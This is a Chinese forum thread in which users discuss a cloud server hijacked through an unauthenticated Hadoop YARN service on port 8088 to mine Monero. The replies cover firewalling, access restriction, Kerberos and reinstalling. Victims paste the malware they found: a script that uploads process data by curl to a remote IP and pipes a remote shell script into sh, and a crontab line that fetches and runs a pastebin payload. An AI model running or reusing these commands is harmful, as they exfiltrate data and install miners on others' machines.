我都关了 root 登录 关闭了密码登录只允许秘钥登录 最后好像还是让某位大哥从 8088 进去了好像? cpu 100%(就是一个阿里云的学生机而已,这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,
问问老哥们怎么防啊 。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。 然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟 就会出问题。
这个 firewall 和安全组能特定多个 ip 访问端口吗? 还有啊 有没有办法把这个搞我的地址弄出来啊 然后顺便加个排除他 ip 之类的
1
WordTian 2018-10-13 22:55:30 +08:00 via Android
cpu 百分百?那估计是挖矿脚本
估计你在 8088 端口启的服务有漏洞 |
2
choice4 OP #!/bin/bash
ps ax --sort=-pcpu > /tmp/tmp2.txt #netstat -antp > /tmp/tmp2.txt #crontab -l > /tmp/tmp2.txt #ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt #top -c -n 1 -b > /tmp/tmp.txt curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php rm -rf /tmp/tmp2.txt LDR="wget -q -O -" if [ -s /usr/bin/curl ]; then LDR="curl"; fi if [ -s /usr/bin/wget ]; then LDR="wget -q -O -"; fi if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ]; then $LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh else pwd fi 这可能是那个脚本 |
4
choice4 OP 以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了 |
5
ech0x 2018-10-13 23:03:09 +08:00 via iPhone
你是要跑什么东西?还是去好好补补安全常识吧,直接 0.0.0.0/0 也是心大。
|
6
t6attack 2018-10-13 23:07:38 +08:00
有漏洞就抓紧补上。留着漏洞,只限 IP,这是什么操作?
|
7
watzds 2018-10-13 23:20:51 +08:00 via Android
哈哈,这点性能也要搞我
两年多前我遇到这种情况是因为 redis 没密码,看看有什么漏洞 |
8
WordTian 2018-10-13 23:29:31 +08:00 via Android
https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
这个是实际执行的二进制文件,看着像门罗币的挖矿病毒 xmrig 我之前开 aria2c 没设密钥的时候也中过一回类似的东西,你还是排查下对外开启的服务吧,看看有哪个可能有漏洞的,话说你 8088 开的什么服务啊 限制 ip 的话,你先看看安全组有没相关的设置吧,有的话用那个就行。 如果有经验的话,可以用 iptables。不行的话用 /etc 下的 host.allow,host.deny 也可以试试 |
9
choice4 OP @WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞, 目前还在继续找解决办法
|
11
zhexi 2018-10-14 00:25:06 +08:00 via Android
iptables 或者 firewall 屏蔽不得行?
|
12
biglee0304 2018-10-14 00:41:20 +08:00 via iPhone
看着的确是挖矿的
|
13
Greenm 2018-10-14 01:40:02 +08:00 via iPhone
Hadoop yarn 吧,这个应该是未添加认证,可以直接执行的,加个口令或者限制在内网。
|
14
h3lica 2018-10-14 02:05:47 +08:00 via iPhone
一般都是脚本刷漏洞的…别人也不是专门入侵你一个…
|
15
LeonKennedy 2018-10-14 08:42:02 +08:00
曾经我每次 ssh 登陆上,好几千的失败登陆。后来我改了端口号,清净了
|
16
likuku 2018-10-14 10:32:08 +08:00 via iPhone
@choice4 不是对外公有服务,那就 ssh is 端口外都关闭,需要访问其它服务,装平装 openvpn,或者 ssh 端口映射到本地。
|
17
choice4 OP @likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录, 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ,后台的版本修复了 。但是我用的那个版本较低,还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢
|
18
likuku 2018-10-14 11:27:18 +08:00 1
@choice4 ssh 端口无所谓,只允许 key 认证 + 禁止 root 登陆就行了(个人观点),#18 我意思是 ss 之外其它端口干脆都禁掉,需要用的话,利用 openvpn (当然要仅对允许的访客 IP 开端口,当然要使用证书连接),或者 ssh 端口映射本地。
另外,系统已经被爆(橘),受到污染的情况下,最好是备份好数据和能信任的干净配置信息前提下,干掉系统重装+更新+防火期 了事。 |
19
choice4 OP @Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号
|
21
liangzi 2018-10-14 12:52:45 +08:00
46.249.38.186 防火墙屏蔽一下不行吗?这个机器是”大便“的开 22 口了
|
22
hdonghong 2018-10-14 15:44:22 +08:00
兄弟怎么解决的。。我也是 crontab 显示:*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
终止后仍然是 cpu100% |
23
realkenshinji 2018-10-14 16:34:28 +08:00 via iPhone
@likuku 学习了
|
24
choice4 OP @hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查
|
25
forgetandnew 2018-10-15 01:39:20 +08:00 via iPhone
ufw deny 8088
|
26
zyp0921 2018-10-15 08:50:49 +08:00
iptables -A INPUT -j DROP
|
27
aloof 2018-10-15 09:35:49 +08:00
阿里云的安全规则里面把所有端口全部关完。只开要使用的端口,然后服务器内部的 iptables 再针对已开端口做安全限制
|
28
choice4 OP @aloof 8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了
|
29
opengps 2018-10-15 10:15:28 +08:00 via Android
如果能确定是从 8088 入侵,那就是你这个程序有漏洞
安全组,防火墙只是一道阀门,关闭端口而已,只属于防护 |
30
CoderGeek 2018-10-15 10:39:23 +08:00
门罗币 hadoop 的漏洞 。 我之前也遭过
|
31
choice4 OP @CoderGeek 请问你最后是怎么解决呢? 关死端口不太方便我这边。 伪分布式的。所有服务都是在这台机器启动的。 这会在琢磨弄一下一个叫 kerberos 安全认证的东西。看看能不能其效果。 分享一下经验吧谢谢
|
32
CoderGeek 2018-10-15 11:07:44 +08:00
@choice4 备份数据 重装 升级 hadoop 版本 开启 kerberos 认证 google 上有解决方法
我那个 留有后门 我清了 crontab 立马就会还原 又开始挖矿 我自己解决不了 只能选择重装了 = = 很伤 |
33
CoderGeek 2018-10-15 11:08:13 +08:00
先去看版本吧 有几个版本都有这个问题
|
34
qwefdrt 2018-11-23 00:17:55 +08:00
tcpdump 抓包把访问 8088 端口的 IP 抓出来,再用 firewall 禁止掉
|